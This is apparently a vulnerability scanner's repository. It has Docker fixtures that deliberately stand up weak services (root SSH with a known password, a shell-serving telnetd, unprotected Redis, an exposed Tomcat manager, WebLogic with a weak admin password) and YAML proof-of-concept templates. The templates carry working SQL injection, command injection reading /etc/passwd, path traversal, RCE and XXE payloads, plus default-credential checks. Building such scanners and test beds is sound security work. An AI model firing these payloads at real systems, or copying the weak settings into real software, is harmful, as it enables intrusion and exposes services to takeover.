EXPOSE 7474 7687 8 | 9 | CMD ["neo4j"] -------------------------------------------------------------------------------- /TestDocker/Neo4j/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | neo4j: 4 | image: neo4j:4.4 5 | ports: 6 | - "7474:7474" 7 | - "7687:7687" 8 | environment: 9 | - NEO4J_AUTH=neo4j/123456 10 | - NEO4J_dbms_security_auth_enabled=true 11 | container_name: 
neo4j-weak -------------------------------------------------------------------------------- /TestDocker/Oracle/Dockerfile: -------------------------------------------------------------------------------- 1 | # 使用Oracle官方容器镜像 2 | FROM container-registry.oracle.com/database/express:21.3.0-xe 3 | 4 | # 设置环境变量 5 | ENV ORACLE_PWD=123456 6 | ENV ORACLE_CHARACTERSET=AL32UTF8 7 | 8 | # 开放1521端口 9 | EXPOSE 1521 5500 10 | 11 | # 健康检查 12 | HEALTHCHECK --interval=30s --timeout=30s --start-period=5m --retries=3 \ 13 | CMD nc -z localhost 1521 || exit 1 -------------------------------------------------------------------------------- /TestDocker/Oracle/README.txt: -------------------------------------------------------------------------------- 1 | 首先需要在Oracle Container Registry网站注册并接受许可协议: 2 | https://container-registry.oracle.com 3 | 4 | docker login container-registry.oracle.com 5 | 6 | docker build -t oracle-db . 7 | 8 | docker run -d \ 9 | -p 1521:1521 \ 10 | --name oracle-container \ 11 | oracle-db -------------------------------------------------------------------------------- /TestDocker/POP3/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t pop3-test . 
2 | docker run -d --name pop3-server -p 110:110 -p 995:995 pop3-test -------------------------------------------------------------------------------- /TestDocker/Postgre/Dockerfile: -------------------------------------------------------------------------------- 1 | # 使用PostgreSQL官方镜像 2 | FROM postgres:latest 3 | 4 | # 设置环境变量 5 | ENV POSTGRES_USER=postgres 6 | ENV POSTGRES_PASSWORD=123456 7 | ENV POSTGRES_DB=mydb 8 | 9 | # 开放5432端口 10 | EXPOSE 5432 11 | 12 | # 健康检查 13 | HEALTHCHECK --interval=30s --timeout=3s \ 14 | CMD pg_isready -U postgres || exit 1 -------------------------------------------------------------------------------- /TestDocker/Postgre/README.md: -------------------------------------------------------------------------------- 1 | docker build -t postgres-server . 2 | docker run -d \ 3 | -p 5432:5432 \ 4 | --name postgres-container \ 5 | postgres-server -------------------------------------------------------------------------------- /TestDocker/RabbitMQ/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM rabbitmq:3-management 2 | 3 | # 环境变量设置默认的用户名和密码 4 | ENV RABBITMQ_DEFAULT_USER=admin 5 | ENV RABBITMQ_DEFAULT_PASS=123456 6 | 7 | # 开放标准端口 8 | # 5672: AMQP 协议端口 9 | # 15672: HTTP API 端口和管理UI 10 | EXPOSE 5672 15672 -------------------------------------------------------------------------------- /TestDocker/RabbitMQ/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t rabbitmq-weak . 2 | docker run -d --name rabbitmq-test -p 5672:5672 -p 15672:15672 rabbitmq-weak -------------------------------------------------------------------------------- /TestDocker/Redis/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t redis-server . 
2 | docker run -d \ 3 | -p 6379:6379 \ 4 | --name redis-container \ 5 | redis-server -------------------------------------------------------------------------------- /TestDocker/Redis/redis.conf: -------------------------------------------------------------------------------- 1 | bind 0.0.0.0 2 | port 6379 3 | protected-mode no 4 | dir /data 5 | daemonize no -------------------------------------------------------------------------------- /TestDocker/Rsync/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t rsync-test . 2 | docker run -d --name rsync-server -p 873:873 rsync-test -------------------------------------------------------------------------------- /TestDocker/SMTP/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t smtp-weak . 2 | docker run -d --name smtp-test -p 25:25 smtp-weak -------------------------------------------------------------------------------- /TestDocker/SMTP/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | service postfix start 3 | tail -f /var/log/mail.log -------------------------------------------------------------------------------- /TestDocker/SNMP/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | # 安装SNMP服务 4 | RUN apt-get update && \ 5 | DEBIAN_FRONTEND=noninteractive apt-get install -y snmpd && \ 6 | rm -rf /var/lib/apt/lists/* 7 | 8 | # 备份原配置 9 | RUN cp /etc/snmp/snmpd.conf /etc/snmp/snmpd.conf.orig 10 | 11 | # 创建新的配置文件 12 | RUN echo "rocommunity public default" > /etc/snmp/snmpd.conf && \ 13 | echo "rocommunity private default" >> /etc/snmp/snmpd.conf && \ 14 | echo "rocommunity cisco default" >> /etc/snmp/snmpd.conf && \ 15 | echo "rocommunity community default" >> /etc/snmp/snmpd.conf && \ 16 | # 允许从任何地址访问 17 | echo "agentAddress udp:161,udp6:[::1]:161" >> 
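/etc/snmp/snmpd.conf

# SNMP port (UDP)
EXPOSE 161/udp

# Run snmpd in the foreground, logging to stdout, using only the config written above
CMD ["snmpd", "-f", "-Lo", "-C", "-c", "/etc/snmp/snmpd.conf"]
-------------------------------------------------------------------------------- /TestDocker/SNMP/README.txt: --------------------------------------------------------------------------------
docker build -t snmp-weak .
Port published on loopback only; drop the 127.0.0.1: prefix if the scanner runs on another host.
docker run -d --name snmp-test -p 127.0.0.1:161:161/udp snmp-weak
-------------------------------------------------------------------------------- /TestDocker/SSH/Dockerfile: --------------------------------------------------------------------------------
# Deliberately weak SSH fixture: password login as root with a known password.
# "latest" is unpinned; pin a release if reproducible builds matter.
FROM ubuntu:latest

# Install the OpenSSH server
RUN apt-get update && apt-get install -y \
    openssh-server \
    && rm -rf /var/lib/apt/lists/*

# sshd expects its privilege-separation directory to exist
RUN mkdir /var/run/sshd

# Enable root password login. The sed only matches the stock commented-out
# line; if the default sshd_config ever changes, it silently does nothing and
# the README's login test will fail, which is the signal to revisit this.
RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
# Intentionally weak root password for scanner testing
RUN echo 'root:Aa123456789' | chpasswd

# SSH port
EXPOSE 22

# Run sshd in the foreground
CMD ["/usr/sbin/sshd", "-D"]
-------------------------------------------------------------------------------- /TestDocker/SSH/README.txt: --------------------------------------------------------------------------------
docker build -t ubuntu-ssh .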
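Port published on loopback only; drop the 127.0.0.1: prefix if the scanner runs on another host.
docker run -d -p 127.0.0.1:2222:22 ubuntu-ssh
-------------------------------------------------------------------------------- /TestDocker/Telnet/Dockerfile: --------------------------------------------------------------------------------
# Deliberately weak Telnet fixture.
FROM busybox:latest

# busybox already ships telnetd; this step only verifies the applet is present
RUN ["busybox", "telnetd", "--help"]

# Test user with a weak password
RUN adduser -D -h /home/test test && \
    echo "test:123456" | chpasswd

# Weak-password "admin" user
RUN adduser -D -h /home/admin admin && \
    echo "admin:admin" | chpasswd

# Telnet port
EXPOSE 23

# Run telnetd in the foreground (-F).
# NOTE(review): -l /bin/sh hands every connection a shell with no login
# prompt, so the users and passwords created above are never consulted.
# If this fixture is meant to exercise password checks, run the login
# program instead (-l /bin/login, which needs the busybox login applet).
CMD ["busybox", "telnetd", "-F", "-l", "/bin/sh"]
-------------------------------------------------------------------------------- /TestDocker/Telnet/README.md: --------------------------------------------------------------------------------
docker build -t telnet-test .

The port is published on loopback only; drop the `127.0.0.1:` prefix if the
scanner runs on another host.

docker run -d -p 127.0.0.1:23:23 --name telnet-server telnet-test
-------------------------------------------------------------------------------- /TestDocker/Tomcat/Dockerfile: --------------------------------------------------------------------------------
# Deliberately weak Tomcat fixture: manager apps reachable remotely with weak users.
FROM tomcat:9.0-jdk8

# Remove the stock webapps; the bundled apps are restored from webapps.dist below
RUN rm -rf /usr/local/tomcat/webapps/*

# Users and roles for the manager apps (weak on purpose)
COPY tomcat-users.xml /usr/local/tomcat/conf/

# Replace the manager/host-manager context so access is not limited to localhost
COPY context.xml /usr/local/tomcat/webapps.dist/manager/META-INF/
COPY context.xml /usr/local/tomcat/webapps.dist/host-manager/META-INF/

# Restore the bundled apps, now including the patched manager contexts
RUN cp -r /usr/local/tomcat/webapps.dist/* /usr/local/tomcat/webapps/

EXPOSE 8080
CMD ["catalina.sh", "run"]
-------------------------------------------------------------------------------- /TestDocker/Tomcat/README.txt: --------------------------------------------------------------------------------
docker build -t tomcat-weak .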
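Port published on loopback only; drop the 127.0.0.1: prefix if the scanner runs on another host.
docker run -d --name tomcat-test -p 127.0.0.1:8080:8080 tomcat-weak
-------------------------------------------------------------------------------- /TestDocker/Tomcat/context.xml: --------------------------------------------------------------------------------
1 | 2 | 3 | 5 |
-------------------------------------------------------------------------------- /TestDocker/VNC/README.txt: --------------------------------------------------------------------------------
docker build -t vnc-server .
Port published on loopback only; drop the 127.0.0.1: prefix if the scanner runs on another host.
docker run -d -p 127.0.0.1:5901:5901 vnc-server
-------------------------------------------------------------------------------- /TestDocker/VNC/supervisord.conf: --------------------------------------------------------------------------------
; supervisord keeps the container alive and restarts the VNC server if it exits
[supervisord]
nodaemon=true

; VNC display :1 (TCP 5901), run as the unprivileged vncuser
[program:vnc]
command=/usr/bin/vncserver :1 -geometry 1280x800 -depth 24
user=vncuser
autostart=true
autorestart=true
-------------------------------------------------------------------------------- /TestDocker/Weblogic/Dockerfile: --------------------------------------------------------------------------------
# Deliberately weak WebLogic fixture.
FROM container-registry.oracle.com/middleware/weblogic:12.2.1.4-dev

# Domain settings. The admin password is intentionally weak for scanner
# testing. create-domain.py and start.sh read these at container start.
ENV DOMAIN_NAME="base_domain" \
    ADMIN_PORT="7001" \
    ADMIN_NAME="weblogic" \
    ADMIN_PASSWORD="weblogic123" \
    PRODUCTION_MODE="dev" \
    DOMAIN_HOME="/u01/oracle/user_projects/domains/base_domain"

USER oracle

# Domain-creation script and entrypoint
COPY --chown=oracle:oracle create-domain.py /u01/oracle/
COPY --chown=oracle:oracle start.sh /u01/oracle/
RUN chmod +x /u01/oracle/start.sh

EXPOSE 7001 7002

CMD ["/u01/oracle/start.sh"]
-------------------------------------------------------------------------------- /TestDocker/Weblogic/README.txt: --------------------------------------------------------------------------------
docker build -t weblogic-weak .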
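Ports published on loopback only; drop the 127.0.0.1: prefix if the scanner runs on another host.
docker run -d --name weblogic-test -p 127.0.0.1:7001:7001 -p 127.0.0.1:7002:7002 weblogic-weak
-------------------------------------------------------------------------------- /TestDocker/Weblogic/create-domain.py: --------------------------------------------------------------------------------
# WLST (Jython) script: creates the domain used by the WebLogic test fixture.
# Values are read from the environment with defaults equal to the literals the
# Dockerfile sets, so the Dockerfile's ENV block is the single source of truth
# and the container behaves as before when nothing is overridden.
import os

domain_name = os.environ.get('DOMAIN_NAME', 'base_domain')
admin_name = os.environ.get('ADMIN_NAME', 'weblogic')
admin_password = os.environ.get('ADMIN_PASSWORD', 'weblogic123')
admin_port = int(os.environ.get('ADMIN_PORT', '7001'))
start_mode = os.environ.get('PRODUCTION_MODE', 'dev')
domain_home = os.environ.get('DOMAIN_HOME', '/u01/oracle/user_projects/domains/base_domain')

# Load the base WebLogic domain template
readTemplate("/u01/oracle/wlserver/common/templates/wls/wls.jar")

# Set the admin user's password (intentionally weak: scanner fixture).
# The path names the template's own default domain and user; the domain is
# renamed only afterwards, so this path stays literal.
cd('/Security/base_domain/User/weblogic')
cmo.setPassword(admin_password)

# Domain name and creation options
cd('/')
cmo.setName(domain_name)
setOption('DomainName', domain_name)
setOption('ServerStartMode', start_mode)
setOption('OverwriteDomain', 'true')

# Admin server: empty ListenAddress means every interface
cd('/Servers/AdminServer')
set('ListenAddress', '')
set('ListenPort', admin_port)

# Write the domain to disk and release the template
writeDomain(domain_home)
closeTemplate()

exit()
-------------------------------------------------------------------------------- /TestDocker/Weblogic/start.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Entrypoint: create the domain, then run the admin server in the foreground.
# set -e: if domain creation exits non-zero, stop here instead of trying to
# start a server from a domain directory that was never written.
set -e

# Create the domain
wlst.sh -skipWLSModuleScanning /u01/oracle/create-domain.py

# Short grace period before starting the server
sleep 5

# Start the admin server (same default domain home as the Dockerfile)
"${DOMAIN_HOME:-/u01/oracle/user_projects/domains/base_domain}/bin/startWebLogic.sh"
-------------------------------------------------------------------------------- /WebScan/pocs/74cms-sqli-1.yml: --------------------------------------------------------------------------------
name: poc-yaml-74cms-sqli-1
set:
  rand: randomInt(200000000, 210000000)
rules:
  - method: POST
    path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
    headers:
      Content-Type: 'text/xml'
    body: ]>&test;111112331%' union select md5({{rand}})#
    follow_redirects: false
    expression: |
      response.body.bcontains(bytes(md5(string(rand))))
detail:
  author: betta(https://github.com/betta-cyber)
  links:
    - 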
https://www.uedbox.com/post/29340 17 | -------------------------------------------------------------------------------- /WebScan/pocs/74cms-sqli-2.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli-2 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: rexus 11 | links: 12 | - https://www.uedbox.com/post/30019/ 13 | -------------------------------------------------------------------------------- /WebScan/pocs/74cms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-74cms-sqli 2 | rules: 3 | - method: GET 4 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a 5 | expression: | 6 | response.body.bcontains(b"ef775988943825d2871e1cfa75473ec") 7 | detail: 8 | author: jinqi 9 | links: 10 | - https://www.t00ls.net/articles-54436.html 11 | -------------------------------------------------------------------------------- /WebScan/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-CVE-2017-7504-Jboss-serialization-RCE 2 | rules: 3 | - method: GET 4 | path: /jbossmq-httpil/HTTPServerILServlet 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b'This is the JBossMQ HTTP-IL') 7 | detail: 8 | author: mamba 9 | description: "CVE-2017-7504-Jboss-serialization-RCE by chaosec公众号" 10 | links: 11 | - https://github.com/chaosec2021 12 | -------------------------------------------------------------------------------- /WebScan/pocs/CVE-2022-22954-VMware-RCE.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-CVE-2022-22954-VMware-RCE 2 | rules: 3 | - method: GET 4 | path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d 5 | expression: | 6 | response.status == 400 && "device id:".bmatches(response.body) 7 | detail: 8 | author: mamba 9 | description: "CVE-2022-22954-VMware-RCE by chaosec公众号" 10 | links: 11 | - https://github.com/chaosec2021 12 | -------------------------------------------------------------------------------- /WebScan/pocs/Hotel-Internet-Manage-RCE.yml: -------------------------------------------------------------------------------- 1 | name: Hotel-Internet-Manage-RCE 2 | rules: 3 | - method: GET 4 | path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1" 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"parent.doTestResult") 7 | detail: 8 | author: test 9 | Affected Version: "Hotel Internet Billing & Operation Support System" 10 | links: 11 | - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8 12 | 13 | -------------------------------------------------------------------------------- /WebScan/pocs/active-directory-certsrv-detect.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-active-directory-certsrv-detect 2 | rules: 3 | - method: GET 4 | path: /certsrv/certrqad.asp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM") 8 | detail: 9 | author: AgeloVito 10 | links: 11 | - https://www.cnblogs.com/EasonJim/p/6859345.html 
12 | -------------------------------------------------------------------------------- /WebScan/pocs/activemq-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-activemq-default-password 2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 401 && response.body.bcontains(b"Unauthorized") 7 | - method: GET 8 | path: /admin/ 9 | headers: 10 | Authorization: Basic YWRtaW46YWRtaW4= 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") 13 | detail: 14 | author: pa55w0rd(www.pa55w0rd.online/) 15 | links: 16 | - https://blog.csdn.net/ge00111/article/details/72765210 -------------------------------------------------------------------------------- /WebScan/pocs/airflow-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-airflow-unauth 2 | rules: 3 | - method: GET 4 | path: /admin/ 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"Airflow - DAGs") && response.body.bcontains(b"

DAGs

") 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | links: 10 | - http://airflow.apache.org/ 11 | -------------------------------------------------------------------------------- /WebScan/pocs/alibaba-canal-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-canal-default-password 2 | rules: 3 | - method: POST 4 | path: /api/v1/user/login 5 | expression: | 6 | response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login") 7 | - method: POST 8 | path: /api/v1/user/login 9 | headers: 10 | Content-Type: application/json 11 | body: >- 12 | {"username":"admin","password":"123456"} 13 | follow_redirects: false 14 | expression: | 15 | response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"") 16 | detail: 17 | author: jweny(https://github.com/jweny) 18 | links: 19 | - https://www.cnblogs.com/xiexiandong/p/12888582.html 20 | -------------------------------------------------------------------------------- /WebScan/pocs/alibaba-canal-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-canal-info-leak 2 | rules: 3 | - method: GET 4 | path: /api/v1/canal/config/1/1 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") 8 | detail: 9 | author: Aquilao(https://github.com/Aquilao) 10 | info: alibaba Canal info leak 11 | links: 12 | - https://my.oschina.net/u/4581879/blog/4753320 -------------------------------------------------------------------------------- /WebScan/pocs/alibaba-nacos.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-alibaba-nacos 2 | rules: 3 | - method: GET 
4 | path: /nacos/ 5 | follow_redirects: true 6 | expression: | 7 | response.body.bcontains(bytes("Nacos")) 8 | detail: 9 | author: AgeloVito 10 | info: alibaba-nacos 11 | login: nacos/nacos 12 | links: 13 | - https://blog.csdn.net/caiqiiqi/article/details/112005424 14 | -------------------------------------------------------------------------------- /WebScan/pocs/apache-ambari-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ambari-default-password 2 | rules: 3 | - method: GET 4 | path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name 5 | headers: 6 | Authorization: Basic YWRtaW46YWRtaW4= 7 | expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR") 8 | detail: 9 | author: wulalalaaa(https://github.com/wulalalaaa) 10 | links: 11 | - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide 12 | -------------------------------------------------------------------------------- /WebScan/pocs/apache-axis-webservice-detect.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-axis-webservice-detect 2 | sets: 3 | path: 4 | - services 5 | - servlet/AxisaxiServlet 6 | - servlet/AxisServlet 7 | - services/listServices 8 | - services/FreeMarkerService 9 | - services/AdminService 10 | - axis/services 11 | - axis2/services 12 | - axis/servlet/AxisServlet 13 | - axis2/servlet/AxisServlet 14 | - axis2/services/listServices 15 | - axis/services/FreeMarkerService 16 | - axis/services/AdminService 17 | rules: 18 | - method: GET 19 | path: /{{path}} 20 | expression: | 21 | response.body.bcontains(b"Services") && response.body.bcontains(b'?wsdl">') 22 | detail: 23 | author: AgeloVito 24 | links: 25 | - https://paper.seebug.org/1489 26 | 
-------------------------------------------------------------------------------- /WebScan/pocs/apache-httpd-cve-2021-41773-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal 2 | groups: 3 | cgibin: 4 | - method: GET 5 | path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | icons: 9 | - method: GET 10 | path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd 11 | expression: | 12 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 13 | detail: 14 | author: JingLing(https://github.com/shmilylty) 15 | links: 16 | - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ -------------------------------------------------------------------------------- /WebScan/pocs/apache-httpd-cve-2021-41773-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-httpd-cve-2021-41773-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh 8 | body: echo;expr {{r1}} + {{r2}} 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 11 | detail: 12 | author: B1anda0(https://github.com/B1anda0) 13 | links: 14 | - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 15 | -------------------------------------------------------------------------------- /WebScan/pocs/apache-kylin-unauth-cve-2020-13937.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-kylin-unauth-cve-2020-13937 2 | rules: 3 | - method: GET 4 | path: /kylin/api/admin/config 5 | expression: | 6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && 
response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url") 7 | detail: 8 | author: JingLing(github.com/shmilylty) 9 | links: 10 | - https://s.tencent.com/research/bsafe/1156.html 11 | -------------------------------------------------------------------------------- /WebScan/pocs/apache-nifi-api-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-nifi-api-unauthorized-access 2 | manual: true 3 | transport: http 4 | rules: 5 | - method: GET 6 | path: /nifi-api/flow/current-user 7 | follow_redirects: false 8 | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"identity\":\"anonymous\",\"anonymous\":true") 9 | detail: 10 | author: wulalalaaa(https://github.com/wulalalaaa) 11 | links: 12 | - https://nifi.apache.org/docs/nifi-docs/rest-api/index.html 13 | -------------------------------------------------------------------------------- /WebScan/pocs/apache-ofbiz-cve-2018-8033-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-apache-ofbiz-cve-2018-8033-xxe 2 | rules: 3 | - method: POST 4 | path: /webtools/control/xmlrpc 5 | headers: 6 | Content-Type: application/xml 7 | body: >- 8 | ]>&disclose; 9 | follow_redirects: false 10 | expression: > 11 | response.status == 200 && response.content_type.contains("text/xml") && "root:[x*]:0:0:".bmatches(response.body) 12 | detail: 13 | author: su(https://suzzz112113.github.io/#blog) 14 | links: 15 | - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py 16 | -------------------------------------------------------------------------------- /WebScan/pocs/aspcms-backend-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-aspcms-backend-leak 2 | rules: 3 | - method: GET 4 | path: /plug/oem/AspCms_OEMFun.asp 5 | expression: | 6 | response.status == 
200 && "